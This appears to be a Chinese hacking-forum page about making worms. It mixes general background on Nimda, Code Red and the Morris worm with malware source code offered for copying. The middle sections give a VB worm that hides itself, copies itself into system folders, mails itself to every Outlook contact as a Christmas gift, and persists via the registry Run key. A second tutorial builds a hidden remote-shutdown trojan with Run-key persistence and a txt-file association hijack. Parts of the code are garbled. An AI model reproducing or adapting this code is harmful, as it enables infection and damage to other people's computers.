黑客技术群

蠕虫病毒是怎么制作的要用到哪些代码

蠕虫病毒是一种常见的计算机病毒。它是利用网络进行复制和传播，传染途径是通过网络和电子邮件。最初的蠕虫病毒定义是因为在DOS环境下，病毒发作时会在屏幕上出现一条类似虫子的东西，胡乱吞吃屏幕上的字母并将其改形。 蠕虫病毒是自包含的程序(或是一套程序),它能传播它自身功能的拷贝或它（蠕虫病毒）的某些部分到其他的计算机系统中(通常是经过网络连接)。请注意，与一般病毒不同，蠕虫不需要将其自身附着到宿主程序，它是一种独立智能程序。有两种类型的蠕虫：主机蠕虫与网络蠕虫。主计算机蠕虫完全包含（侵占）在它们运行的计算机中，并且使用网络的连接仅将自身拷贝到其他的计算机中，主计算机蠕虫在将其自身的拷贝加入到另外的主机后，就会终止它自身(因此在任意给定的时刻，只有一个蠕虫的拷贝运行)，这种蠕虫有时也叫"野兔"，蠕虫病毒一般是通过1434端口漏洞传播。 比如近几年危害很大的“尼姆亚”病毒就是蠕虫病毒的一种,去年春天流行“熊猫烧香”以及其变种也是蠕虫病毒。这一病毒利用了微软视窗操作系统的漏洞，计算机感染这一病毒后，会不断自动拨号上网，并利用文件中的地址信息或者网络共享进行传播，最终破坏用户的大部分重要数据。 蠕虫病毒的一般防治方法是：使用具有实时监控功能的杀毒软件，并且注意不要轻易打开不熟悉的邮件附件。 蠕虫是怎么发作的？ 如何采取有效措施防范蠕虫？ 一、利用操作系统和应用程序的漏洞主动进行攻击 此类病毒主要是“红色代码”和“尼姆亚”，以及至今依然肆虐的”求职信”等。由于IE浏览器的漏洞（IFRAME EXECCOMMAND），使得感染了“尼姆亚”病毒的邮件在不去手工打开附件的情况下病毒就能激活，而此前即便是很多防病毒专家也一直认为，带有病毒附件的邮件，只要不去打开附件，病毒不会有危害。“红色代码”是利用了微软IIS服务器软件的漏洞(idq.dll远程缓存区溢出)来传播，SQL蠕虫王病毒则是利用了微软的数据库系统的一个漏洞进行大肆攻击。 二、传播方式多样 如“尼姆亚”病毒和”求职信”病毒，可利用的传播途径包括文件、电子邮件、Web服务器、网络共享等等。 三、病毒制作技术新 与传统的病毒不同的是，许多新病毒是利用当前最新的编程语言与编程技术实现的，易于修改以产生新的变种，从而逃避反病毒软件的搜索。另外，新病毒利用Java、ActiveX、VB Script等技术，可以潜伏在HTML页面里，在上网浏览时触发。 四、与黑客技术相结合，潜在的威胁和损失更大 以红色代码为例，感染后的机器的web目录的\scripts下将生成一个root.exe，可以远程执行任何命令，从而使黑客能够再次进入。 蠕虫和普通病毒不同的一个特征是蠕虫病毒往往能够利用漏洞，这里的漏洞或者说是缺陷，可以分为两种，即软件上的缺陷和人为的缺陷。软件上的缺陷，如远程溢出、微软IE和Outlook的自动执行漏洞等等，需要软件厂商和用户共同配合，不断地升级软件。而人为的缺陷，主要指的是计算机用户的疏忽。这就是所谓的社会工程学（social engineering），当收到一封邮件带着病毒的求职信邮件时候，大多数人都会抱着好奇去点击的。对于企业用户来说，威胁主要集中在服务器和大型应用软件的安全上，而对个人用户而言，主要是防范第二种缺陷。 五、对个人用户产生直接威胁的蠕虫病毒 在以上分析的蠕虫病毒中，只对安装了特定的微软组件的系统进行攻击，而对广大个人用户而言，是不会安装IIS（微软的因特网服务器程序，可以允许在网上提供web服务）或者是庞大的数据库系统的。因此，上述病毒并不会直接攻击个个人用户的电脑（当然能够间接的通过网络产生影响）。但接下来分析的蠕虫病毒，则是对个人用户威胁最大，同时也是最难以根除，造成的损失也更大的一类蠕虫病毒。 对于个人用户而言，威胁大的蠕虫病毒采取的传播方式，一般为电子邮件（Email）以及恶意网页等等。 对于利用电子邮件传播的蠕虫病毒来说，通常利用的是各种各样的欺骗手段诱惑用户点击的方式进行传播。恶意网页确切地讲是一段黑客破坏代码程序，它内嵌在网页中，当用户在不知情的情况下打开含有病毒的网页时，病毒就会发作。

蠕虫病毒代码是多少，我只是想把代码放在记事本里

========================从这行以下开始复制===========================

Sub Main()

'TaskVisible的功能是把程序在End Task表中除掉。

App.TaskVisible = False

'阻止问题发生

On Error Resume Next

Dim Location, Location2, DesLocation, DesLocation2

'得到EXE的位置

Location = App.Path "\" App.EXEName ".exe"

Location2 = App.Path App.EXEName ".exe"

'设定目的地

DesLocation = "C:\WINDOWS\SYSTEM\WinMapi.exe"

DesLocation2 = "C:\WINNT\SYSTEM\Mapi.exe"

'开始复制自己

FileCopy Location, DesLocation

FileCopy Location2, DesLocation

FileCopy Location, DesLocation2

FileCopy Location2, DesLocation2

Dim Var1, FilePath, FileName, FullLocation, MyApp

Dim Christmas, List, AddList, AddressListCount

Dim Merry, AdEntries, Attachs, Msg

Var1 = "True"

FilePath = App.Path

FileName = App.EXEName

FullLocation = FilePath "\" FileName

Set MyApp = CreateObject("Outlook.Application")

If MyApp = "Outlook" Then

Set Christmas = MyApp.GetNameSpace("mapi")

Set List = Christmas.AddressLists

For Each Addresslist In List

If Addresslist.AddressEntries.Count 0 Then

AddressListCount = Addresslist.AddressEntries.Count

For AddList = 1 To AddressListCount

Set Merry = MyApp.CreateItem(0)

Set AdEntries = Addresslist.AddressEntries(AddList)

Merry.To = AdEntries.Address

Merry.Subject = "圣诞节快乐!!"

Merry.Body = "圣诞节快乐！这是一个特别个你的圣诞节的礼物！过个快乐的圣诞节! "

Set Attachs = Merry.Attachments

Attachs.Add FullLocation

If Var1 = "true" Then

Merry.DeleteAfterSubmit = True

If Msg.To "" Then

Merry.send

End If

End If

Next

Beep

End If

Next

End If

Dim Reg

Set Reg = CreateObject("wscript.Shell")

'把资料写入Registry

Reg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Mapi", "C:\WINNT\SYSTEM\Mapi.exe"

Reg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinMapi", "C:\WINDOWS\SYSTEM\WinMapi.exe"

End Sub

====================这行和这行以下不要复制===========================

可以用的话，别忘了给我分，测试方法：保存时把记事本名称的后缀改为.bat用杀软查毒。

vb脚本蠕虫例子代码

首先，新建一工程，名为Server，新建一个窗体，Name为Server，在窗体中加入一个winsock控件，Name设为sckServer，协议设为默认的TCP／IP协议。

接下来我们回来Server窗体模块中，添加如下代码：

Private Sub form_Load()

　With Me

.sckServer.LocalPort = 88917'本地端口（呵呵！我的生日！）

.sckServer.Listen '开始监听

　End With

End Sub

'接受客户端的连接请求。

Private Sub sckServer_ConnectionRequest(ByVal requestID As Long)

　With Me

If .sckServer.State sckClosed Then .sckServer.Close

.sckServer.Accept (requestID)

　End With

End Sub

下面我们来建立客户端程序：新建一个工程，名为Client，把窗体名为Client，在上面加入一个winsock控件，名为sckClient，协议为TCP／IP协议。再加一个按钮cmdConnect在窗体模块中加入代码：

Private Sub form_Load()

　With Me

.sckClient.RemoteHost = "127.0.0.1"'设置远程IP，本例设为本机。

.sckClient.RemotePort = 86112'远程端口,就为server中的设置一样.

　End With

End Sub

Private sub cmdConnect_Click()

　SckClient.Connect

End sub

至此，单击Connect按钮我们的两个工程已经可以进行通信了，但看不见，你可以在Client中的sckClient_Connect事件中加入代码：debug.print “Connetion successful!”来查看。

这仅是第一步，一点工作也做不了，下面我们来为它们添加功能。为了5礔2单，本文章只实现一点小小的功能―――关机，重启，注销。好，开始吧！

在Server工程中新建一个模块，Name为modApi，这个模快为一些API函数，添加如下API函数：

Public Declare Function ExitWindowXXX Lib "user32" Alias "ExitWindowXXX" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long

Public Const EWX_LOGOFF = 0

Public Const EWX_REBOOT = 2

Public Const EWX_SHUTDOWN = 1

Public Declare Function ClipCursor Lib "user32" Alias "ClipCursor" (lpRect As Any) As Long

Public Type RECT

　Left As Long

　Top As Long

　Right As Long

　Bottom As Long

End Type

注：在两个socket中编程中，进行通信的重要事件是DataArrival事件，用于接收远程数据。

下面在Client工程的Client窗体中放入三个按钮，分别为cmdExit,cmdLogoff,cmdReboot。它们用于对远程的关机，注销，重启操作。分别添加如下代码：

Private Sub cmdExit_Click()

　Me.sckClient.SendData "Exit"

End Sub

Private Sub cmdLogoff_Click()

　Me.sckClient.SendData "Logoff"

End Sub

Private Sub cmdReboot_Click()

　Me.sckClient.SendData "Reboot"

End Sub

全都是对服务端发出请求。下面转到Server工程中：在Server中添加sckServer的DataArrial事件，接收客户端的请求。

Private Sub sckServer_DataArrival(ByVal bytesTotal As Long)

　Dim strData As String

　With Me

' 接收客户请求的信息

.sckServer.GetData strData

Select Case strData

　Case "Exit"

'关机

Call ExitWindowXXX(EWX_SHUTDOWN, 0)

　Case "Reboot"

'重启

Call ExitWindowXXX(EWX_REBOOT, 0)

　Case "Logoff"

'注销

　Call ExitWindowXXX(EWX_LOGOFF, 0)

End Select

　End With

End Sub

好了,到此我们已经实现功能了，但还不行，我们要它在背后运行。这简单，在Server中的form_Load事件中加入一句：me.hide。好这下看不见了，但大家知道木马是一开机就自动运行了，这又是为什么，怎么实现的？把它加入到注册表的启动组中？对，不错，跟我来吧！

回到Server工程中的modApi中加入如下API函数：

Public Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

Public Declare Function RegSetvalueEx Lib "advapi32.dll" Alias "RegSetvalueExA" (ByVal hKey As Long, ByVal lpvalueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long

Public Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

Public Const REG_BINARY = 3

Public Const REG_SZ = 1

Public Const HKEY_LOCAL_MACHINE = H80000002

Public Const HKEY_CLASSES_ROOT = H80000000

写到注册表启动组中的过程。

Public Sub StartupGroup()

　Dim sKey As String

　Dim result As Long

　Dim hKeyID As Long

　Dim sKeyVal As String

　sKey = "Systrsy" '启动组中的键,找一个与系统文件相近的。

　sKeyVal = "C:/windows/system/systrsy.exe" '木马文件的路径，可以用GetSystemDirectory来取得系统路径。

　result = RegOpenKey(HKEY_LOCAL_MACHINE, _

　 "Software/Microsoft/Windows/CurrentVersion/Run", hKeyID)

　If result = 0 Then

result = RegSetvalueEx(hKeyID, sKey, 0, REG_SZ, sKeyVal, Len(sKey) + 1)

　End If

End Sub

好，就这样简单地完成了。但是，想过没有，如果不是很菜的鸟，到注册表中见一删，我们苦苦的心血不就白白地浪费了吗？不行，还得想让他发现了删也删不掉。请看下面的代码：

Public Sub WriteToTxt()

　Dim result As Long

　Dim hKeyID As Long

　Dim skey As String

　Dim skeyVal As String

　skey = "txtfile/shell/open/command"

　skeyVal = "C:/windows/system/txtView.exe"

　result = RegOpenKey(HKEY_CLASSES_ROOT, skeyVal, hKeyID)

　If result = 0 Then

result = RegSetvalueEx(hKeyID, skey, 0, REG_SZ, skeyVal, Len(skeyVal) + 1)

　End If

End Sub

肯定不少朋友一看就知道了，原是与txt文件进行关联，一点也不错，但C:/windows/system/txtView.exe是哪里来的，我们的木马是C:/windows/system/systrsy.exe呀。这可是我们木马的分身了。

好，回到Server工程的Server窗体的form_Load中，加入如下代码：

Dim sCurrentPath As String, sSystemDir As String

sCurrentPath = App.Path "/" App.EXEName ".exe"

sSystemDir = “C:/windows/system”

On Error Resume Next

　'复制文件成系统目录下的Systrsy.exe

　FileCopy sCurrentPath, sSystemDir "/Systrsy.exe"

On Error Resume Next

复制文件成系统目录下的txtView.exe

FileCopy sCurrentPath, sSystemDir "/txtView.exe"

调用

Call startupGroup

Call WriteToTxt

'判断程序是否下在运行

If App.PrevInstance Then

　'如果已经运行就退出。

End

End If

好了，写到这里一个破坏性木马已经诞生了，我实验过还是比较好的一个，希望大家也能写一个好的木马，能突破冰河(呵呵！)

注意：

1、大家在处理端口是最好使用高端端口，否则会和一些常用端口发生冲突

2、在第一次使用VB.NET的最好看看有关的图书，可能你能写出一款超级木马也说不定

网络蠕虫病毒代码分析

蠕虫病毒是自包含的程序(或是一套程序),它能传播它自身功能的拷贝或它的某些部分到其

他的计算机系统中(通常是经过网络连接)。请注意，与一般病毒不同，蠕虫不需要将其自身附着到宿主程序，有两种类型的蠕虫：主机蠕虫与网络蠕虫。主计算机蠕虫完全包含在它们运行的计算机中，并且使用网络的连接仅将自身拷贝到其他的计算机中，主计算机蠕虫在将其自身的拷贝加入到另外的主机后，就会终止它自身(因此在任意给定的时刻，只有一个蠕虫的拷贝运行)，这种蠕虫有时也叫"野兔"，蠕虫病毒一般是通过1434端口漏洞传播。

比如近几年危害很大的“尼姆亚”病毒就是蠕虫病毒的一种，2007年1月流行的“熊猫烧香”以及其变种也是蠕虫病毒。这一病毒利用了微软视窗操作系统的漏洞，计算机感染这一病毒后，会不断自动拨号上网，并利用文件中的地址信息或者网络共享进行传播，最终破坏用户的大部分重要数据。蠕虫病毒的一般防治方法是：使用具有实时监控功能的杀毒软件，并且注意不要轻易打开不熟悉的邮件附件。

形成原因利用漏洞主动进行攻击

此类病毒主要是“红色代码”和“尼姆亚”，以及至今依然肆虐的“求职信”等。由于IE浏览器的漏洞（IFRAMEEXECCOMMAND），使得感染了“尼姆亚”病毒的邮件在不去手工打开附件的情况下病毒就能激活，而此前即便是很多防病毒专家也一直认为，带有病毒附件的邮件，只要不去打开附件，病毒不会有危害。“红色代码”是利用了微软IIS服务器软件的漏洞(idq.dll远程缓存区溢出)来传播，SQL蠕虫王病毒则是利用了微软的数据库系统的一个漏洞进行大肆攻击。

传播方式多样

如“尼姆亚”病毒和”求职信”病毒，可利用的传播途径包括文件、电子邮件、Web服务器、网络共享等等。

病毒制作技术新

与传统的病毒不同的是，许多新病毒是利用当前最新的编程语言与编程技术实现的，易于修改以产生新的变种，从而逃避反病毒软件的搜索。另外，新病毒利用Java、ActiveX、VBScript等技术，可以潜伏在HTML页面里，在上网浏览时触发。

康乃尔大学研究生罗伯特▪莫里斯是利用了下列哪种系统漏洞制作了蠕虫病毒？

UNIX。

莫里斯蠕虫利用了Unix系统中sendmail、Finger、rsh/rexec等程序的已知漏洞以及薄弱的密码制作了蠕虫病毒。

罗伯特·莫里斯，即罗伯特·泰潘·莫里斯，网络代号rtm，美国程式员、计算机科学家与企业家。1988年了创造互联网上的第一只电脑蠕虫程式，散布在互联网后，造成多个电脑系统瘫痪，因此被定罪。曾创办Viaweb，是Y Combinator的共同创办人之一。

罗伯特·莫里斯是美国国家计算机安全中心(隶属于美国国家安全局NSA)首席科学家的儿子，康奈尔大学的高材生，在1988年的第一次工作过程中戏剧性地散播出了网络蠕虫病毒后，“Hacker”一词开始在英语中被赋予了特定的含义。在此次的事故中成千上万的电脑收到了影响，并导致了部分电脑崩溃。